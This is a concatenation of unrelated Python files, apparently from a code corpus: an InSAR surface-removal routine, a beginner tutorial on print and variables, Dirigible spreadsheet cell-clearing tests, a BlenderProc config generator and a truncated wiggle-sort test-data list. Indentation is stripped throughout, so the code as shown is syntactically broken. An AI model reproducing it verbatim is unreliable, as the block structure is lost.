dataOut[ysub[2*i]:ysub[2*i+1],:] = dataOut_i[ysub[2*i]:ysub[2*i+1],:]
## 2 - last Masks
for i in range(1,surfaceNum):
print 'removing '+str(i+1)+'th surface ...'
mask_i = np.zeros(data.shape,data.dtype)
mask_i[ysub[2*i]:ysub[2*i+1],:] = mask[ysub[2*i]:ysub[2*i+1],:]
dataOut_i,ramp_i = remove_data_surface(data,mask_i,surf_type)
if ysub[2*i] < ysub[2*i-1]:
dataOut[ysub[2*i]:ysub[2*i-1],:] += dataOut_i[ysub[2*i]:ysub[2*i-1],:]
dataOut[ysub[2*i]:ysub[2*i-1],:] /= 2
dataOut[ysub[2*i-1]:ysub[2*i+1],:] = dataOut_i[ysub[2*i-1]:ysub[2*i+1],:]
else:
dataOut[ysub[2*i]:ysub[2*i+1],:] = dataOut_i[ysub[2*i]:ysub[2*i+1],:]
return dataOut
##################################################################
def remove_surface(File, surf_type, maskFile=None, outFile=None, ysub=None):
start = time.time()
atr = readfile.read_attribute(File)
# Output File Name
if not outFile:
outFile = os.path.splitext(File)[0]+'_'+surf_type+os.path.splitext(File)[1]
if maskFile:
Mask = readfile.read(maskFile)[0]
print 'read mask file: '+maskFile
else:
Mask = np.ones((int(atr['FILE_LENGTH']), int(atr['WIDTH'])))
print 'use mask of the whole area'
##### Input File Info
atr = readfile.read_attribute(File)
k = atr['FILE_TYPE']
print 'Input file is '+k
print 'remove ramp type: '+surf_type
## Multiple Datasets File
if k in ['interferograms','coherence','wrapped','timeseries']:
h5file = h5py.File(File,'r')
epochList = sorted(h5file[k].keys())
epoch_num = len(epochList)
prog_bar = ptime.progress_bar(maxValue=epoch_num)
h5flat = h5py.File(outFile,'w')
group = h5flat.create_group(k)
print 'writing >>> '+outFile
if k in ['timeseries']:
print 'number of acquisitions: '+str(len(epochList))
for i in range(epoch_num):
epoch = epochList[i]
data = h5file[k].get(epoch)[:]
if not ysub:
data_n,ramp = remove_data_surface(data, Mask, surf_type)
else:
data_n = remove_data_multiple_surface(data, Mask, surf_type, ysub)
dset = group.create_dataset(epoch, data=data_n, compression='gzip')
prog_bar.update(i+1, suffix=epoch)
for key,value in h5file[k].attrs.iteritems():
group.attrs[key] = value
elif k in ['interferograms','wrapped','coherence']:
print 'number of interferograms: '+str(len(epochList))
date12_list = ptime.list_ifgram2date12(epochList)
for i in range(epoch_num):
epoch = epochList[i]
data = h5file[k][epoch].get(epoch)[:]
if not ysub:
data_n,ramp = remove_data_surface(data,Mask,surf_type)
else:
data_n = remove_data_multiple_surface(data, Mask, surf_type, ysub)
gg = group.create_group(epoch)
dset = gg.create_dataset(epoch, data=data_n, compression='gzip')
for key,value in h5file[k][epoch].attrs.iteritems():
gg.attrs[key] = value
prog_bar.update(i+1, suffix=date12_list[i])
## Single Dataset File
else:
data,atr = readfile.read(File)
print 'Removing '+surf_type+' from '+k
if not ysub:
data_n,ramp = remove_data_surface(data, Mask, surf_type)
else:
data_n = remove_data_multiple_surface(data, Mask, surf_type, ysub)
print 'writing >>> '+outFile
writefile.write(data_n,atr,outFile)
try:
h5file.close()
h5flat.close()
prog_bar.close()
except: pass
print 'Remove '+surf_type+' took ' + str(time.time()-start) +' secs'
return outFile
| 2.46875 | 2 |
01_comment_print_variables.py | rriquelme/python_3_tutorial | 0 | 12762232 | # Section 1: Comments and Print
# A single line comment in python is indicated by a # at the beginning
''' This
is
a
multiline
comment '''
# A print function prints the code to the console, useful to learn and to debug
print('This is a print') # a comment can also be added after a funcion declaration or variable declaration.
print('you can print multiple things separated by a comma','like this and python will add a space in between')
# Section 2: Variables
var_1 = 5 # This is a int variable
var_2 = 'a' # There is a str variable, no need to invoke int or str as other languages.
var_3 = 1. # Theis is a float variable
print('Hello World!') # This is regular print
print('Hello','World!') # To append in a print on 2.X version a, is used and it adds a space between
print('Hello',end=" ") # The comma could be at the end
print('World!') # and the result will be the same
print('var_1', var_1) # It could be really helpful to print variables
print('var_2', var_2) # It doesnt care if it is a int str or float etc
print('var_3', var_3) # It doesnt care if it is a int str or float etc
print('var_1 is a ',type(var_1)) # Use 'type' to check which type of variable like int
print('var_2 is a ',type(var_2)) # or str
print('var_3 is a ',type(var_3)) # or float
# List, Dictionary, Tuples
print('List:')
L = [2, 5, 8, 'x', 'y'] # This is a list
print(L) # An easy way to print it is with print.
print(L[0]) # The first element starts with 0
print(L[-1]) # The last element is -1
print(L[0:3]) # This will select the elements 0, 1 and 2 (Warning!: not the 3)
print(L[2:4]) # This will select element 2 and 3
print(L[:-2]) # All elements except the last two
print(L[-2:]) # from the element [-2] until the end
L.append('z') #This is the Way to append elements to a list
print(L) # View the list with the last element appended.
print('Dictionary:')
D = {'k1': 123, 'k2': 456, 1:'v3'} # This is a Dictionary syntax key:value
print(D) # This is how to print a dictionary
print(D['k1']) # This is how to print a value with a given key
print ('Tuple:')
a, b = 1, 5 # The values can be assigned to each element separated with commas
print ('a',a) # value of a
print ('b',b) # value of b
| 4.59375 | 5 |
dirigible/fts/tests/test_2734_ClearCells.py | EnoX1/dirigible-spreadsheet | 168 | 12762233 | # Copyright (c) 2010 Resolver Systems Ltd.
# All Rights Reserved
#
try:
import unittest2 as unittest
except ImportError:
import unittest
from functionaltest import FunctionalTest
import key_codes
from textwrap import dedent
class Test_2734_ClearCells(FunctionalTest):
def test_delete_key_clears_selected_cells(self):
self.assert_key_deletes_cells(key_codes.DELETE)
def test_backspace_key_clears_selected_cells(self):
self.assert_key_deletes_cells(key_codes.BACKSPACE)
def assert_key_deletes_cells(self, key_code):
# * Harold logs in and creates a new sheet
self.login_and_create_new_sheet()
# * He enters some data in A1:A3
self.enter_cell_text(1, 1, 'a1')
self.enter_cell_text(1, 2, 'a2')
self.enter_cell_text(1, 3, 'a3')
self.wait_for_cell_value(1, 3, 'a3')
# * He clicks on A1 and hits delete
self.click_on_cell(1, 1)
self.human_key_press(key_code)
# * He sees the value in A1 disappear while the others remain
self.wait_for_cell_value(1, 1, '')
self.wait_for_cell_value(1, 2, 'a2')
self.wait_for_cell_value(1, 3, 'a3')
# * He selects the range a2:a3
self.select_range_with_shift_click((1, 2), (1, 3))
# He hits delete
self.human_key_press(key_code)
# * He sees that all the cells are now cleared
self.wait_for_cell_value(1, 1, '')
self.wait_for_cell_value(1, 2, '')
self.wait_for_cell_value(1, 3, '')
def test_delete_key_while_editing_still_does_what_it_should(self):
# * Harold logs in and creates a new sheet
self.login_and_create_new_sheet()
# * He enters three characters in A1
self.open_cell_for_editing(1, 1)
self.human_key_press(key_codes.NUMBER_1)
self.human_key_press(key_codes.NUMBER_2)
self.human_key_press(key_codes.NUMBER_3)
# * He moves left twice
self.human_key_press(key_codes.LEFT)
self.human_key_press(key_codes.LEFT)
# He hits delete
self.human_key_press(key_codes.DELETE)
# the middle character is now missing
self.wait_for_cell_editor_content('13')
def test_backspace_key_while_editing_still_does_what_it_should(self):
# * Harold logs in and creates a new sheet
self.login_and_create_new_sheet()
# * He enters three characters in A1
self.open_cell_for_editing(1, 1)
self.human_key_press(key_codes.NUMBER_1)
self.human_key_press(key_codes.NUMBER_2)
self.human_key_press(key_codes.NUMBER_3)
# * He moves left once
self.human_key_press(key_codes.LEFT)
# He hits backspace
self.human_key_press(key_codes.BACKSPACE)
# the middle character is now missing
self.wait_for_cell_editor_content('13')
def test_can_clear_cell_from_usercode(self):
# * Harold logs in and creates a new sheet
self.login_and_create_new_sheet()
# * He enters some data in A1:A3
self.enter_cell_text(1, 1, 'a1')
self.enter_cell_text(1, 2, 'a2')
self.enter_cell_text(1, 3, 'a3')
self.wait_for_cell_value(1, 3, 'a3')
# * He tries to use the clear() function from usercode on a cell
# and then tries to access some of the supposedly cleared attributes of the cell
self.prepend_usercode(dedent('''
worksheet.a1.error = 'harold puts a deliberate pointless error in'
worksheet.a1.clear()
worksheet.b1.formula = str(worksheet.a1.value)
worksheet.b2.formula = str(worksheet.a1.formula)
worksheet.b3.formula = str(worksheet.a1.formatted_value)
worksheet.b4.formula = str(worksheet.a1.error)
'''))
# * He sees the value in a1 disappear
self.wait_for_cell_value(1, 1, '')
self.wait_for_cell_value(1, 2, 'a2')
self.wait_for_cell_value(1, 3, 'a3')
# * He sees his little investigations also produce the expected results
self.wait_for_cell_value(2, 1, '<undefined>')
self.wait_for_cell_value(2, 2, 'None')
self.wait_for_cell_value(2, 3, '')
self.wait_for_cell_value(2, 4, 'None')
def test_can_clear_cell_range_from_usercode(self):
# * Harold logs in and creates a new sheet
self.login_and_create_new_sheet()
# * He enters some data in A1:A3
self.enter_cell_text(1, 1, 'a1')
self.enter_cell_text(1, 2, 'a2')
self.enter_cell_text(1, 3, 'a3')
self.wait_for_cell_value(1, 3, 'a3')
# * He tries to use the clear() function from usercode on a cell range
self.prepend_usercode(dedent('''
worksheet.a1.error = 'harold puts a deliberate pointless error in'
worksheet.a2.error = 'harold puts another deliberate pointless error in'
worksheet.cell_range("a1:a2").clear()
worksheet.b1.formula = str(worksheet.a1.value)
worksheet.b2.formula = str(worksheet.a1.formula)
worksheet.b3.formula = str(worksheet.a1.formatted_value)
worksheet.b4.formula = str(worksheet.a1.error)
worksheet.c1.formula = str(worksheet.a2.value)
worksheet.c2.formula = str(worksheet.a2.formula)
worksheet.c3.formula = str(worksheet.a2.formatted_value)
worksheet.c4.formula = str(worksheet.a2.error)
'''))
# * He sees the value in a1 and a2 disappear
self.wait_for_cell_value(1, 1, '')
self.wait_for_cell_value(1, 2, '')
self.wait_for_cell_value(1, 3, 'a3')
# * He sees his little investigations also produce the expected results
self.wait_for_cell_value(2, 1, '<undefined>')
self.wait_for_cell_value(2, 2, 'None')
self.wait_for_cell_value(2, 3, '')
self.wait_for_cell_value(2, 4, 'None')
self.wait_for_cell_value(3, 1, '<undefined>')
self.wait_for_cell_value(3, 2, 'None')
self.wait_for_cell_value(3, 3, '')
self.wait_for_cell_value(3, 4, 'None')
| 2.671875 | 3 |
blenderproc/create_config.py | sriharshav/instr | 22 | 12762234 | """
Helper script to create config files for BlenderProc.
"""
import os
import yaml
import random
import numpy as np
import binascii
# these paths have to be manually set before creating a config
BLENDERPROC_ROOT = '' # /path/to/BlenderProc
SHAPENET_ROOT = '' # /path/to/ShapeNetCore.v2
SUNCG_ROOT = '' # /path/to/suncg
DEST = '' # /path/to/output_folder
def get_random_house_path():
with open(os.path.join(BLENDERPROC_ROOT, 'suncg_houses.txt'), 'r') as f:
house_paths = f.readlines()
return os.path.join(SUNCG_ROOT, random.choice(house_paths)).strip()
def get_base_cfg():
with open(os.path.join(BLENDERPROC_ROOT, 'base_config.yaml'), 'r') as f:
base_cfg = yaml.load(f)
return base_cfg
def get_random_obj_configs(n=10):
obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs = [], [], [], [], [], []
with open(os.path.join(BLENDERPROC_ROOT, 'shapenet_objects.txt'), 'r') as f:
obj_paths = f.readlines()
for i in range(n):
scale = np.random.uniform(0.1, 0.4)
recalculate_uv = np.random.uniform(0., 1.)
obj_base_cfg = {
"module": "loader.CustomObjectLoader",
"config": {
"path": os.path.join(SHAPENET_ROOT, random.choice(obj_paths)[:-1]),
"scale": [scale, scale, scale],
"add_properties": {
"cp_object_to_scale": True,
"cp_sample_pose": True,
"cp_category_id": int(i+2),
"cp_coarse_grained_class": "selected_object",
"cp_type": "Object",
"cp_physics": True,
"cp_cc_texture": True
},
}
}
scale_base_cfg = {
"module": "manipulators.EntityManipulator",
"config": {
"selector": {
"provider": "getter.Entity",
"conditions": {
"cp_category_id": int(i+2),
}
},
"scale": [scale, scale, scale],
"cf_add_modifier": {
"name": "Solidify",
"thickness": 0.0025
},
"cf_randomize_materials": {
"randomization_level": 1.,
"materials_to_replace_with": {
"provider": "getter.Material",
"conditions": {
"cp_is_cc_texture": True
}
}
},
}
}
mat_base_cfg = {
"module": "manipulators.MaterialManipulator",
"config": {
"selector": {
"provider": "getter.Entity",
"conditions": {
"cp_category_id": int(i + 2),
}
},
"cf_set_Roughness": {
"provider": "sampler.Value",
"type": "float",
"min": 0.05,
"max": 0.5,
},
"cf_set_Specular": {
"provider": "sampler.Value",
"type": "float",
"min": 0.5,
"max": 1.0,
},
"cf_color_link_to_displacement": {
"provider": "sampler.Value",
"type": "float",
"min": 0.001,
"max": 0.15
},
"cf_set_Alpha": 1.0,
"mode": "once_for_each"
}
}
sampler_base_cfg = {
"module": "object.OnSurfaceSampler",
"config": {
"objects_to_sample": {
"provider": "getter.Entity",
"conditions": {
"cp_category_id": int(i+2)
}
},
"surface": {
"provider": "getter.Entity",
"index": 0,
"conditions": {
"name": "selected_table"
}
},
"pos_sampler": {
"provider": "sampler.UpperRegionSampler",
"to_sample_on": {
"provider": "getter.Entity",
"index": 0,
"conditions": {
"name": "selected_table"
}
},
"min_height": 1,
"max_height": 4,
"face_sample_range": [0.4, 0.6],
"use_ray_trace_check": False,
},
"min_distance": 0.1,
"max_distance": 1.5,
"rot_sampler": {
"provider": "sampler.Uniform3d",
"min": [0, 0, 0],
"max": [6.28, 6.28, 6.28]
}
}
}
physics_base_cfg = {
"module": "object.PhysicsPositioning",
"config": {
"min_simulation_time": 0.5,
"max_simulation_time": 2,
"check_object_interval": 1,
}
}
grav_off_cfg = {
"module": "manipulators.EntityManipulator",
"config": {
"selector": {
"provider": "getter.Entity",
"conditions": {
"cp_category_id": int(i + 2),
}
},
"cp_physics": False,
}
}
scale_base_cfg["config"]["cf_add_uv_mapping"] = {
"projection": "cylinder",
"forced_recalc_of_uv_maps": True if recalculate_uv > 0.5 else False
}
mat_base_cfg["config"]["cf_add_uv_mapping"] = {
"projection": "cylinder",
"forced_recalc_of_uv_maps": True if recalculate_uv > 0.5 else False
}
obj_configs.append(obj_base_cfg)
scale_configs.append(scale_base_cfg)
mat_configs.append(mat_base_cfg)
sample_configs.append(sampler_base_cfg)
physic_configs.append(physics_base_cfg)
gravoff_configs.append(grav_off_cfg)
return obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs
def create_config():
base_cfg = get_base_cfg()
baseline = 0.065
focal_length_x = 541.14
focal_length_y = 541.14
base_cfg['modules'][8]['config']['intrinsics']['interocular_distance'] = baseline
base_cfg['modules'][8]['config']['intrinsics']['cam_K'] = [focal_length_x, 0.0, 320.0, 0.0, focal_length_y, 240.0, 0.0, 0.0, 1.0]
# add objects
num_objs = np.random.randint(5, 12)
obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs = get_random_obj_configs(n=num_objs)
for obj_config, scale_config, mat_config, sample_config, physics_config, gravoff_config in zip(obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs):
base_cfg['modules'].insert(6, obj_config)
base_cfg['modules'].insert(7, scale_config)
base_cfg['modules'].insert(8, sample_config)
base_cfg['modules'].insert(9, physics_config)
base_cfg['modules'].insert(10, gravoff_config)
# set house path
base_cfg['modules'][1]['config']['path'] = get_random_house_path()
# replace house with cctextures
house_cc_texture_config = {
"module": "manipulators.EntityManipulator",
"config": {
"selector": {
"provider": "getter.Entity",
"conditions": {
"type": "MESH"
}
},
"cf_randomize_materials": {
"randomization_level": 0.4,
"materials_to_replace_with": {
"provider": "getter.Material",
"random_samples": 1,
"conditions": {
"cp_is_cc_texture": True # this will return one random loaded cc textures
}
}
}
}
}
base_cfg['modules'].insert(4, house_cc_texture_config)
# set output dir
output_prefix = os.urandom(20)
output_prefix = binascii.hexlify(output_prefix)
output_prefix = str(output_prefix)[2:-1]
output_path = os.path.join(DEST, output_prefix)
os.makedirs(output_path)
base_cfg['modules'][0]['config']['global']['output_dir'] = output_path
with open(os.path.join(DEST, output_prefix + '/config.yaml'), 'w') as f:
yaml.dump(base_cfg, f)
return os.path.join(DEST, output_prefix + '/config.yaml')
if __name__ == '__main__':
path = create_config()
print(path)
| 2.3125 | 2 |
test/generators/wiggle_sort_ii.py | yanqd0/LeetCode | 0 | 12762235 | <filename>test/generators/wiggle_sort_ii.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
FIELDS = ['nums']
ROWS = [
([1]),
([1, 2]),
([1, 2, 1]),
([1, 1, 2]),
([3, 2, 4]),
([1, 5, 1, 1, 6, 4]),
([1, 3, 2, 2, 3, 1]),
([1, 1, 2, 2, 2, 1]),
([1, 1, 1, 1, 2, 2, 2]),
# ([1, 1, 1, 2, 2, 2, 2]),
([4, 5, 5, 6]),
([3, 3, 3, 2, 2, 2, 3, 2, 1, 1, 2, 1, 2, 3, 3, 3, 1, 2]),
([
9, 4, 8, 2, 5, 10, 4, 4, 2, 7, 8, 8, 10, 4, 10, 10, 2, 6, 4, 9, 3, 5,
9, 8, 3, 3, 10, 3, 5, 7, 2, 9, 10, 1, 9, 7, 9, 8, 8, 7, 1, 3, 9, 5, 2,
1, 9, 3, 4, 6, 9, 5, 7, 10, 3, 10, 3, 9, 1, 2, 1, 7, 3, 4, 2, 8, 7, 4,
4, 7, 10, 2, 4, 1, 3, 7, 9, 8, 9, 6, 3, 6, 6, 1, 6, 6, 3, 9, 1, 5, 9,
2, 3, 10, 10, 3, 2, 10, 9, 6, 5, 3, 4, 5, 8, 7, 8, 8, 6, 3, 10, 10, 5,
8, 9, 10, 2, 3, 8, 7, 4, 10, 9, 10, 8, 8, 9, 9, 3, 10, 8, 3, 8, 3, 3,
4, 1, 6, 4, 5, 5, 4, 8, 3, 3, 5, 3, 3, 1, 2, 3, 4, 6, 8, 1, 9, 8, 9,
10, 8, 2, 10, 8, 9, 8, 8, 2, 9, 8, 5, 1, 9, 2, 3, 2, 4, 6, 10, 9, 10,
4, 6, 2, 5, 2, 10, 8, 4, 5, 3, 8, 7, 9, 1, 10, 5, 8, 10, 8, 2, 6, 10,
1, 3, 7, 7, 6, 5, 4, 5, 7, 2, 5, 9, 9, 5, 7, 1, 5, 4, 3, 2, 3, 8, 9, 3,
7, 6, 2, 5, 6, 6, 3, 7, 7, 6, 4, 1, 2, 1, 9, 8, 4, 7, 10, 3, 4, 8, 4,
1, 1, 3, 4, 6, 9, 10, 5, 8, 1, 3, 8, 1, 1, 1, 6, 3, 9, 7, 1, 9, 8, 4,
10, 6, 1, 6, 3, 5, 8, 9, 2, 4, 6, 8, 5, 5, 3, 9, 4, 8, 9, 1, 2, 9, 4,
10, 10, 5, 5, 5, 9, 1, 3, 2, 9, 2, 10, 9, 2, 9, 2, 7, 4, 9, 8, 2, 10,
6, 7, 1, 9, 1, 4, 3, 6, 6, 1, 1, 4, 6, 4, 5, 6, 8, 7, 3, 3, 8, 2, 1,
10, 1, 5, 4, 2, 7, 7, 2, 5, 9, 1, 2, 8, 3, 2, 4, 1, 6, 6, 7, 3, 2, 3,
10, 6, 10, 2, 7, 7, 5, 8, 8, 1, 4, 9, 1, 1, 6, 9, 6, 10, 8, 1, 10, 8,
1, 2, 6, 5, 5, 2, 6, 8, 7, 6, 9, 7, 9, 5, 10, 3, 1, 4, 4, 7, 7, 10, 8,
3, 6, 5, 9, 1, 10, 2, 3, 8, 6, 1, 7, 4, 1, 4, 3, 4, 6, 6, 5, 7, 3, 6,
10, 10, 7, 5, 2, 4, 6, 6, 5, 6, 2, 4, 5, 9, 8, 9, 9, 10, 2, 5, 6, 9, 7,
8, 9, 9, 6, 4, 8, 7, 8, 4, 7, 9, 2, 8, 4, 5, 1, 5, 2, 6, 3, 8, 9, 6, 8,
3, 2, 7, 3, 1, 8, 2, 4, 9, 4, 2, 1, 1, 7, 3, 8, 1, 9, 9, 8, 10, 8, 6,
5, 10, 9, 6, 10, 8, 2, 7, 2, 8, 10, 7, 1, 2, 6, 2, 8, 8, 4, 4, 7, 3, 4,
7, 9, 9, 2, 5, 4, 5, 5, 2, 8, 6, 10, 5, 5, 10, 9, 7, 10, 2, 5, 7, 8,
10, 2, 8, 10, 2, 9, 5, 9, 9, 6, 9, 1, 4, 10, 2, 2, 10, 8, 10, 1, 7, 3,
6, 8, 3, 3, 7, 9, 9, 3, 9, 6, 2, 5, 2, 8, 5, 5, 6, 4, 6, 1, 1, 6, 8, 7,
3, 8, 4, 9, 8, 7, 7, 4, 10, 8, 8, 9, 4, 8, 2, 10, 6, 10, 7, 6, 6, 2, 5,
2, 5, 5, 2, 8, 8, 6, 6, 7, 4, 7, 1, 8, 2, 6, 10, 5, 10, 8, 4, 4, 8, 1,
6, 9, 5, 1, 8, 6, 9, 5, 10, 6, 10, 8, 8, 9, 4, 1, 10, 1, 10, 8, 4, 4,
5, 2, 10, 2, 1, 6, 2, 8, 10, 10, 2, 2, 6, 7, 10, 1, 5, 1, 5, 2, 2, 1,
3, 6, 1, 4, 5, 3, 2, 1, 8, 1, 7, 1, 6, 7, 7, 4, 2, 10, 2, 6, 4, 2, 2,
4, 9, 7, 5, 7, 4, 3, 10, 7, 9, 4, 3, 3, 3, 10, 8, 3, 7, 7, 8, 8, 6, 4,
7, 4, 6, 10, 4, 7, 10, 9, 10, 8, 9, 5, 2, 9, 9, 1, 6, 9, 7, 10, 10, 8,
8, 2, 7, 7, 6, 9, 6, 3, 8, 8, 2, 2, 5, 9, 5, 1, 10, 4, 1, 9, 9, 2, 5,
3, 7, 7, 4, 3, 8, 7, 5, 8, 9, 4, 7, 7, 6, 5, 1, 10, 1, 5, 5, 8, 1, 1,
7, 6, 8, 9, 4, 9, 2, 5, 9, 10, 6, 8, 4, 9, 2, 6, 7, 6, 8, 6, 3, 8, 1,
8, 1, 1, 7, 6, 3, 5, 8, 3, 3, 4, 9, 4, 3, 5, 7, 9, 2, 5, 10, 10, 1, 5,
10, 6, 10, 4, 9, 6, 7, 10, 8, 6, 5, 4, 7, 5, 6, 2, 2, 3, 8, 5, 10, 9,
9, 6, 1, 10, 1, 8, 5, 2, 6, 7, 9, 4, 5, 6, 4, 8, 1, 5, 2, 5, 7, 7, 9,
5, 9, 4, 6, 10, 7, 7, 4, 9, 1, 2, 4, 4, 8, 3, 6, 6, 5, 5, 4, 8, 3, 4,
9, 8, 8, 3, 1, 10, 7, 5, 5, 2, 1, 3, 1, 4, 3, 8, 7, 9, 2, 1, 6, 2, 5,
7, 6, 6, 8, 10, 1, 2, 10, 1, 7, 6, 10, 6, 8, 1, 5, 2, 5, 3, 7, 1, 6, 4,
2, 10, 5, 3, 3, 2, 10, 9, 4, 2, 10, 4, 3, 1, 9, 9, 5, 2, 1, 2, 7, 6, 4,
10, 1, 6, 9, 3, 6, 2, 1, 3, 3, 1, 6, 9, 9, 6, 4, 8, 3, 3, 8, 8, 7, 8,
9, 6, 9, 5, 7, 4, 10, 2, 5, 8, 6, 5, 2, 10, 6, 7, 5, 4, 8, 3, 9, 6, 3,
10, 8, 3, 1, 4, 10, 10, 3, 7, 5, 2, 8, 8, 1, 4, 8, 9, 4, 8, 6, 2, 9, 4,
8, 5, 1, 6, 1, 9, 7, 7, 5, 10, 6, 7, 8, 9, 2, 10, 1, 2, 8, 9, 2, 4, 3,
8, 3, 5, 4, 9, 9, 10, 6, 7, 5, 5, 1, 2, 4, 1, 9, 10, 8, 8, 5, 6, 4, 9,
5, 4, 3, 5, 7, 2, 2, 8, 7, 8, 7, 8, 4, 4, 9, 1, 5, 5, 4, 3, 6, 1, 3, 1,
3, 6, 5, 3, 10, 5, 7, 8, 4, 2, 6, 6, 4, 8, 1, 8, 6, 5, 1, 4, 8, 5, 10,
8, 10, 4, 4, 5, 3, 8, 3, 2, 5, 10, 2, 8, 8, 4, 2, 1, 8, 8, 8, 6, 2, 6,
5, 6, 7, 7, 1, 3, 3, 8, 7, 9, 9, 10, 9, 7, 2, 8, 10, 9, 3, 8, 2, 9, 1,
6, 3, 5, 3, 10, 1, 6, 10, 4, 9, 4, 1, 3, 1, 7, 8, 10, 6, 4, 5, 2, 4, 7,
10, 9, 8, 6, 8, 1, 1, 8, 2, 4, 5, 10, 9, 6, 3, 6, 2, 8, 7, 3, 8, 1, 10,
5, 5, 3, 9, 6, 8, 7, 1, 1, 2, 8, 5, 5, 2, 3, 3, 10, 6, 3, 5, 2, 4, 10,
7, 6, 5, 5, 10, 6, 10, 2, 4, 4, 9, 1, 4, 10, 5, 5, 10, 4, 10, 3, 1, 1,
9, 9, 3, 6, 9, 8, 6, 3, 8, 3, 5, 1, 2, 2, 8, 5, 9, 10, 10, 8, 3, 7, 3,
10, 6, 7, 7, 1, 1, 1, 7, 10, 6, 9, 2, 2, 4, 10, 3, 2, 4, 7, 10, 6, 1,
8, 8, 4, 2, 3, 6, 9, 5, 7, 7, 8, 7, 1, 2, 10, 4, 2, 1, 2, 3, 8, 6, 7,
4, 10, 6, 6, 3, 3, 5, 2, 7, 8, 9, 6, 10, 5, 7, 4, 2, 4, 9, 1, 2, 6, 10,
7, 1, 1, 7, 8, 8, 10, 4, 2, 3, 9, 8, 1, 1, 5, 5, 1, 3, 8, 3, 5, 10, 10,
6, 2, 3, 9, 1, 1, 9, 8, 9, 9, 1, 7, 9, 5, 1, 1, 1, 5, 4, 2, 7, 3, 10,
10, 1, 5, 7, 10, 10, 5, 2, 2, 7, 6, 8, 7, 10, 8, 8, 2, 8, 3, 3, 1, 5,
5, 7, 3, 6, 7, 8, 1, 1, 5, 8, 10, 1, 3, 8, 7, 7, 7, 8, 3, 3, 2, 2, 8,
7, 1, 1, 8, 10, 6, 2, 1, 2, 8, 9, 8, 10, 10, 6, 9, 4, 9, 5, 1, 2, 10,
3, 4, 4, 10, 8, 3, 1, 10, 8, 6, 4, 9, 5, 4, 9, 4, 6, 9, 10, 7, 8, 6, 8,
2, 6, 8, 3, 9, 8, 3, 9, 8, 5, 8, 6, 10, 2, 2, 8, 9, 9, 2, 8, 6, 5, 4,
2, 5, 6, 2, 8, 2, 4, 3, 4, 5, 10, 9, 2, 2, 1, 5, 9, 5, 9, 7, 10, 5, 5,
4, 7, 10, 7, 1, 4, 2, 3, 2, 7, 6, 9, 7, 9, 2, 9, 7, 1, 9, 6, 10, 7, 7,
6, 10, 9, 6, 3, 10, 9, 6, 6, 1, 9, 3, 7, 8, 10, 4, 5, 8, 8, 8, 1, 5, 6,
5, 1, 7, 8, 2, 3, 4, 4, 8, 2, 2, 9, 10, 1, 2, 6, 8, 9, 3, 3, 2, 6, 4,
10, 10, 4, 4, 2, 9, 5, 9, 7, 5, 3, 1, 2, 9, 5, 3, 3, 3, 7, 5, 4, 4, 10,
10, 3, 1, 10, 8, 3, 4, 2, 9, 4, 6, 5, 2, 6, 9, 10, 3, 9, 5, 2, 4, 6, 2,
10, 4, 3, 3, 5, 2, 5, 6, 9, 4, 3, 3, 3, 7, 4, 4, 7, 9, 8, 1, 10, 6, 6,
7, 2, 1, 6, 3, 1, 10, 5, 10, 7, 5, 7, 8, 3, 10, 9, 10, 7, 1, 10, 5, 10,
6, 5, 9, 8, 1, 3, 8, 4, 10, 3, 2, 4, 2, 3, 6, 6, 4, 5, 10, 7, 5, 9, 5,
3, 5, 5, 5, 1, 7, 6, 3, 8, 6, 10, 3, 9, 2, 9, 7, 10, 1, 2, 10, 1, 3, 5,
9, 9, 4, 9, 2, 5, 5, 8, 4, 7, 6, 4, 10, 1, 9, 9, 1, 7, 7, 8, 8, 10, 3,
8, 10, 5, 9, 10, 10, 7, 9, 10, 8, 2, 9, 2, 5, 8, 6, 4, 9, 4, 8, 8, 3,
1, 8, 7, 10, 5, 2, 1, 9, 1, 8, 8, 4, 9, 1, 6, 3, 5, 6, 9, 3, 5, 6, 8,
2, 8, 9, 6, 5, 2, 3, 8, 10, 10, 5, 3, 1, 3, 9, 8, 9, 6, 8, 4, 3, 10, 9,
3, 3, 10, 3, 5, 10, 9, 9, 1, 7, 9, 1, 2, 1, 3, 10, 7, 3, 9, 7, 3, 2, 1,
6, 3, 9, 10, 1, 4, 4, 2, 8, 5, 8, 7, 9, 2, 10, 5, 7, 6, 6, 6, 9, 7, 3,
8, 7, 4, 4, 1, 8, 1, 7, 5, 7, 6, 1, 5, 3, 2, 3, 8, 2, 5, 9, 8, 9, 2, 4,
4, 7, 9, 8, 10, 10, 6, 1, 9, 6, 10, 3, 1, 8, 3, 4, 8, 1, 6, 7, 3, 3, 4,
8, 8, 8, 4, 1, 8, 7, 5, 10, 4, 9, 7, 2, 6, 5, 8, 10, 2, 8, 7, 9, 5, 6,
3, 2, 9, 9, 1, 1, 3, 9, 6, 4, 2, 1, 7, 2, 5, 1, 5, 4, 9, 5, 3, 2, 1, 2,
2, 6, 2, 7, 8, 7, 6, 4, 4, 6, 9, 8, 7, 2, 2, 9, 7, 6, 3, 9, 1, 1, 10,
2, 9, 5, 1, 1, 3, 7, 1, 2, 10, 10, 9, 2, 8, 1, 9, 6, 8, 2, 6, 1, 9, 7,
10, 6, 2, 2, 1, 8, 9, 3, 2, 10, 5, 7, 9, 1, 6, 7, 1, 1, 3, 4, 1, 7, 10,
1, 2, 1, 7, 6, 7, 6, 6, 1, 4, 3, 7, 2, 4, 6, 9, 6, 1, 1, 1, 4, 2, 10,
2, 8, 10, 2, 5, 4, 4, 10, 7, 7, 2, 7, 5, 5, 2, 9, 8, 1, 3, 5, 9, 5, 3,
9, 10, 8, 7, 3, 3, 7, 1, 9, 1, 4, 10, 5, 10, 1, 1, 5, 1, 5, 10, 9, 6,
10, 6, 10, 3, 5, 7, 3, 2, 1, 6, 9, 3, 2, 8, 4, 10, 5, 2, 6, 7, 7, 9, 3,
6, 2, 10, 2, 3, 7, 10, 6, 9, 1, 3, 4, 8, 9, 7, 3, 1, 10, 3, 6, 6, 5, 2,
5, 4, 8, 5, 8, 2, 1, 4, 1, 3, 7, 1, 5, 7, 6, 5, 1, 4, 10, 9, 8, 1, 9,
6, 3, 6, 3, 7, 8, 5, 3, 7, 6, 6, 8, 2, 10, 5, 2, 3, 10, 6, 6, 5, 3, 9,
